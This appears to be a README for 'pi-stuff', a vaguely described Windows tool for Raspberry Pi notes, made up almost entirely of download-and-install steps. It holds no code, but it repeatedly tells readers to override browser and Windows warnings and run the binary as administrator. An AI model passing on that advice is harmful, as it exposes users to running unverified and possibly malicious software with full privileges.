Download

📥 Download

Visit this page to download: GitHub Releases

Open the page, look for the latest release, and download the file for Windows. If there are more than one file, choose the one that ends in .exe or .msi.

🖥️ What pi-stuff is

pi-stuff is a small Windows app that helps you work with files and tasks tied to Raspberry Pi use. It keeps common Pi-related items in one place so you can get to them faster.

Use it if you want a simple desktop tool for:

  • keeping Pi notes in one spot
  • opening common Pi files with less clicking
  • managing small helper tasks
  • staying organized while working on Pi projects

✅ What you need

Before you install, check these basics:

  • Windows 10 or Windows 11
  • A keyboard and mouse
  • Internet access for the first download
  • At least 200 MB of free disk space
  • Permission to install apps on your PC

If your PC blocks the download, you may need to choose Keep or Run anyway in your browser or Windows security prompt.

🚀 Get the app

  1. Open the Releases page
  2. Find the newest release near the top
  3. Download the Windows file
  4. Save it to your Downloads folder
  5. Open the file to start the setup or launch the app

If the release contains a .zip file, right-click it and choose Extract All first. Then open the app file inside the folder.

🛠️ Install on Windows

If the download is an installer:

  1. Double-click the .exe or .msi file
  2. Choose Yes if Windows asks for permission
  3. Follow the setup window
  4. Keep the default install folder unless you need a different one
  5. Select Finish when setup ends

If the download is a portable file:

  1. Open the downloaded .zip file
  2. Extract it to a folder you can find again, such as Documents or Desktop
  3. Open the extracted folder
  4. Double-click the app file to run it

🧭 First run

When you start pi-stuff for the first time:

  • wait a few seconds for Windows to check the app
  • allow access if Windows asks
  • look for the main window or tray icon
  • pin it to the Start menu or taskbar if you plan to use it often

If the app does not open, right-click the file and choose Run as administrator.

🧩 Common uses

pi-stuff can help with day-to-day Pi work such as:

  • storing quick links you use often
  • keeping setup notes for one or more Pi devices
  • opening files tied to a project
  • keeping a short list of commands or reminders
  • grouping small tools in one place

📂 Suggested file setup

To keep things easy, make a folder like this:

  • Documents\pi-stuff
  • Documents\pi-stuff\notes
  • Documents\pi-stuff\links
  • Documents\pi-stuff\backups

This makes it easier to find your Pi files later.

🔄 Updates

Check the Releases page when you want the latest version.

To update:

  1. Open the Releases page
  2. Download the newest Windows file
  3. Close the app if it is open
  4. Install the new file or replace the old portable file
  5. Open pi-stuff again

🧠 Tips for smooth use

  • Keep the download in a folder you can find
  • Use the same folder for all Pi-related files
  • Create one backup copy before you make large changes
  • Rename files in a clear way, like pi-setup-notes.txt
  • Store screenshots with the project name and date

❓ Common issues

The browser says the file is unsafe

This can happen with new releases. If you trust the source, go back to the release page and download the file again.

Windows blocks the app

Right-click the file, choose Properties, and see if there is an Unblock box. If you see it, check it and try again.

The app closes right away

Try these steps:

  1. Restart the PC
  2. Download the file again
  3. Make sure the full file finished downloading
  4. Run it from a local folder, not from inside the zip file

I cannot find the downloaded file

Open your browser downloads list and choose Show in folder. The file is often in Downloads.

📎 File names to look for

On the Releases page, look for files with names like:

  • pi-stuff-setup.exe
  • pi-stuff-win64.exe
  • pi-stuff.zip
  • pi-stuff.msi

The exact name may change with each release, but the newest Windows file will be the one you want

🔧 Basic workflow

A simple way to use pi-stuff:

  1. Open the app
  2. Add your Pi notes or files
  3. Keep related items together
  4. Return to the same place next time
  5. Update your files when your setup changes

📌 Best way to use it

Use pi-stuff as your main place for small Pi tasks. Keep it open while you work, or open it only when you need it. A simple routine helps you find files fast and cuts down on clutter

🔐 Safety steps

  • Download only from the release link
  • Check the file name before you open it
  • Keep a backup of anything important
  • Use a folder with a clear name
  • Remove old versions when you no longer need them
